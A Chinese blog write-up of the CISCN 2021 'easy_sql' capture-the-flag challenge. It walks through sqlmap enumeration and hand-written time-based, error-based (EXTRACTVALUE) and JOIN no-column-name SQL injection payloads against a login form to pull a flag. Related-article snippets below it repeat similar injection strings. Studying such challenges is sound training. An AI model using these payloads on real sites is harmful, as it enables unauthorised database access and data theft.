[CISCN2021]easy_sql|Ciyaso

最新推荐文章于 2024-06-18 09:47:40 发布
最新推荐文章于 2024-06-18 09:47:40 发布
阅读量418 收藏 1
点赞数
文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/116938466
版权

easy_sql|Ciyaso

1.首先用sqlmap跑

得知了

库名security

继续跑发现了两个表users和flag
在这里插入图片描述
在这里插入图片描述

然后得知

users下有三个列id,password,username

在这里插入图片描述

flag下有两列,id和一个没有列名的列
在这里插入图片描述

2.然后对 url 进行post注入,发现可以使用报错注入

在这里插入图片描述

admin') AND (SELECT 2155 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479),1,1))>9,0,5)))))PtLg)-- uavL

处理后得到

uname=admin') AND EXTRACTVALUE(null,CONCAT(0x7e,(【代码操作】),0x7e))-- MazD&passwd=admin&Submit=%E7%99%BB%E5%BD%95

3.由于flag列中存在一个不存在列名的列,所以想到了无列名注入

经过多次注入试验发现了过滤了union和columns,输入了就会返回no,然后测试大小写,/**/,%0a等方式都无法绕过所以放弃了union无列名注入

uname=admin') AND EXTRACTVALUE(null,CONCAT(0x7e,((select * from(select 1,2,3 union select * from security)a)b),0x7e))-- MazD&passwd=admin&Submit=%E7%99%BB%E5%BD%95

然后尝试join无列名注入

输入:

uname=admin') AND EXTRACTVALUE(null,CONCAT(0x7e,(select*from (select * from flag as a join flag b using(id))c),0x7e))-- MazD&passwd=admin&Submit=%E7%99%BB%E5%BD%95

返回:

no

输入:

uname=admin') AND EXTRACTVALUE(null,CONCAT(0x7e,(select*from (select * from flag as a join flag b using(id))c),0x7e))-- MazD&passwd=admin&Submit=%E7%99%BB%E5%BD%95

返回:

在这里插入图片描述

提交后发现不对白高兴一场,然后重新检查发现返回的列名是【假flag】

访问:

select 【假flag】 from flag 

uname=' and extractValue(1,(select `43e6b653-965f-491b-a769-f53db0fa7214` from flag)) and '&passwd=admin&Submit=%E7%99%BB%E5%BD%95

即可获得真正的flag
在这里插入图片描述

C1yas0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
UART-FIFO.rar_easy _fifo|uart_uart fifo
09-23
在本压缩包"UART-FIFO.rar_easy fifo|uart_uart fifo"中,我们可以预见到包含的是关于在ARM1138处理器上实现UART-FIFO收发程序的相关资料。 首先,ARM1138是一款高性能的RISC(精简指令集计算机)处理器,广泛应用...
Easy_draw.rar_easy _easy draw_easydraw
09-24
【标题】"Easy_draw.rar" 是一个压缩包文件,其中包含了一个名为 "easy draw" 或 "EasyDraw" 的简易图像处理软件。这个软件是专为编程初学者设计的,旨在帮助他们入门图形用户界面(GUI)开发和图像处理技术。 ...
【极客大挑战 2019】EasySQL
Knsec
05-13 8850
[极客大挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
SQL注入布尔盲注
qq_43936524的博客
02-16 670
记录一下日常发现的SQL注入漏洞,方便以后拓宽思路。 漏洞发现 漏洞的位置在某公司的解决方案模块页面,注入的参数为type,请求方式为get 经过测试发现当type的值为1或者有效数值时页面会正常显示,当数值为type=1 and 1=9时页面出现错误 可推断出and 1 = 9被执行,此次存在SQL布尔盲注漏洞 打开sqlmap选择注入方式为布尔盲注,跑出当前的数据库名 python sqlmap.py -u https://xxx/xx.php?type=1 -v 3 --technique=B --
掌握数据处理新利器:Easy SQL
最新发布
gitblog_00022的博客
06-18 331
掌握数据处理新利器:Easy SQL 项目地址:https://gitcode.com/easysql/easy_sql 在大数据时代,数据提取(Extract)、转换(Transform)和加载(Load,简称ETL)是不可或缺的关键步骤。现在,有一个名为Easy SQL的开源项目,它旨在简化这个过程,让你以一种命令式的方式编写SQL进行ETL工作。基于标准SQL并添加了简单的新语法,你可以一步...
ISCC,WebEasy-SQL
Pai_Space
05-25 2384
select 等被过滤,绕不过 id=1 至 8 有一些信息 id=8 时 用 sqlmap 可以查到数据库是 Mysql 8 Mysql 8 存在 table 注入 浅谈利用mysql8新特性进行SQL注入 - 安全客,安全资讯平台 测是否存在 http://59.110.159.206:7010/?id=-1 union table users limit 0,1 存在,可以利用,由于 id=8 时提示查邮件,看看是否存在 email 回显了 email,查 b
easy_sql解析
qq_73722777的博客
03-08 434
获得列名,但是其中不包含flag项。先尝试打开username和password列查看数据。进入页面,我们看到网页标题为管理员后台,尝试使用万能密码进行登录。回显输入为3时可以正常登录,回显为4显示错误,推测回显位为3。登录后发现登录成功,网页有回显,尝试进行sql注入。网址回显错误,猜测空格被屏蔽,使用/**/代替尝试。获得表名为bighacker,users。爆数据后未发现flag,于是尝试从另一个表入手。获得库名为yunxi_exam,进行爆表名。获得flag,此题结束。得到列名,尝试爆数据。
2021 全国大学生信息安全竞赛ciscn web wp
midi
05-19 2035
2021 ciscn web wpupload 复现几道没做出来的题:> upload 发现文件index.php、example.php 知识点1:绕过getimagesize 在上传的文件最后面加上 #define width 1 #define height 1 知识点2:绕过zip字符中的i 结合 https://bugs.php.net/bug.php?id=77375 使用İ字符可以绕过i字符的匹配,如果php这三个字符也能绕过就能直接上传php了~~,官方中发现只能针对这几个字符
easy_VM.rar_easy
09-23
本文将深入探讨一款名为“easy_VM.rar”的简易虚拟机,该虚拟机专为Windows操作系统设计,虽然功能相对简单,但其核心原理和实现方式对于理解虚拟化技术的基础概念具有重要意义。 “easy_VM.rar”是一款轻量级的...
Fujitsu.zip_easy _fujitsu
09-23
《Fujitsu_Easy_Kit试用手记_从入门到精通》 富士通(Fujitsu)是一家全球知名的IT企业,其产品线广泛,涵盖了硬件、软件和服务等多个领域。Fujitsu_Easy_Kit是富士通推出的一款便捷式解决方案,旨在简化用户的IT操作...
easy_c.zip_easy
09-22
【标题】"easy_c.zip_easy" 是一个专为C语言初学者设计的压缩包,它包含了一系列简单的小型程序,旨在帮助初学者更好地理解和实践C编程基础。这些小程序的目的是让学习过程更加直观和易懂,使初学者能够通过实际操作...
iscc-2022
zhhhb1005的博客
06-05 1022
分析题目,info被强制转换成为数组,get传参 information ,同时要满足step1和step2才能得到flag。step1要求year=2022step2要求item为三个值的数组,第一个值为数组payload pop2022 看开头意思是如果使用get的wish传参那么就反序列化这个wish,如果不是则显示源代码。 流程 exp payload: get传参,然后将结果base64解密。 访问/ypHeMPardErE.zip ,得到源码 这⾥之前可以判断
CISCN2021赛后复现
Atkx's Blog
05-21 1983
esay_sql 输入单引号报错 uname=admin&passwd=123456'&Submit=%E7%99%BB%E5%BD%95 #You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123456'') LIMIT 0,1' at line 1 sqlma
CISCN2021 西北赛区分区赛 Web xb_web_flask_trick
feng的博客
06-08 784
前言 6.5号去了兰州打了分区赛,4道Web出了web1和web4,web2和web3都不会。这题flask是web3,讲道理对我这种对flask不熟悉的弟弟来说还是挺难的,比赛的时候只有西电的一个队伍出了。今天晚上在学长的帮助下终于出了这道题,也是学到了很多的东西。 源码 import os from flask import Flask, request, abort, session app = Flask(__name__) app.config["SECRET_KEY"] = os.urand
[强网杯]easy_sql
fightte的博客
05-17 987
提交1和2会回显一个数组: 相当于1对应的值为“hahahah” 是key-value形式的输出。 尝试输入1’.返回报错,有注入漏洞 尝试1’or 1=1#,并用#截断,输出了三个数组: 尝试堆叠注入,即注入多组sql语句,其中有;隔开, 输入show databases返回了所有的数据表, 尝试查询表名:show tables; 显示了表的名字,在使用sql语句,show columns from xx,来查询其中列的名称: 上图是word的列名, 下图,再查出1919…中的列名: 用sql
2021全国大学生信息安全竞赛初赛部分WP
weixin_45844670的博客
05-17 3997
第一阶段 Misc tiny traffic 分析pcap包,能发现几个可疑的请求——/flag_wrapper、/test、/secret,分别把它们传输的文件提取出来,得到三个压缩包,通过flag.gzip的内容可以确认这个IP就是我们要分析的IP 再使用Peazip分别提取secret和test的压缩包,能发现传输的格式规范 syntax = "proto3"; message PBResponse { int32 code = 1; int64 flag_part_convert_to_h
easy_sql
qq_45951598的博客
11-23 1376
本次题目了来着ctf里的一道supersqli 这里加一个单引号发现报错 这里orderby3就错了,发现只有两个字段。 联合注入发现,有过滤
Web】记录CISCN 2021 总决赛 ezj4va题目复现——AspectJWeaver
uuzeray的博客
03-22 1338
这就是当年传说中的零解题嘛😭,快做🤮了有了之前的经验,思路顺挺快的,中间不知道为啥一直一直一直一直报错,耗了一个下午总算打通考的是AspectJWeaver写恶意字节码到靶机上(本题jsp靶机不解析),再去对其进行反序列化值得一提的是,本题并未在输入流进行黑名单过滤,事实上就是纯粹的原生反序列化,但因该jdk下无利用链可打,所以只能先迂回写入一个恶意类,再对这个恶意类进行反序列化操作,实在是巧思!
[CISCN2021 Quals]easy_sql
jiangdie666的博客
05-18 584
easy_SQL 界面无回显,1’有回显1’'可以绕过。 抓包,sqlmap跑了一下,库security表users字段id,username,password.但没有用。 看了一下,是报错注入,手注了了一下。 首先看fuzz检测一下过滤了什么 前四个都过滤掉了。 库名可以报错注入出来,但是由于from(information_schema.columns)where(table_name)被过滤了。 不能继续使用extractvalue爆表名字。换一种姿势。 无列名注入。 http://www.wupc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值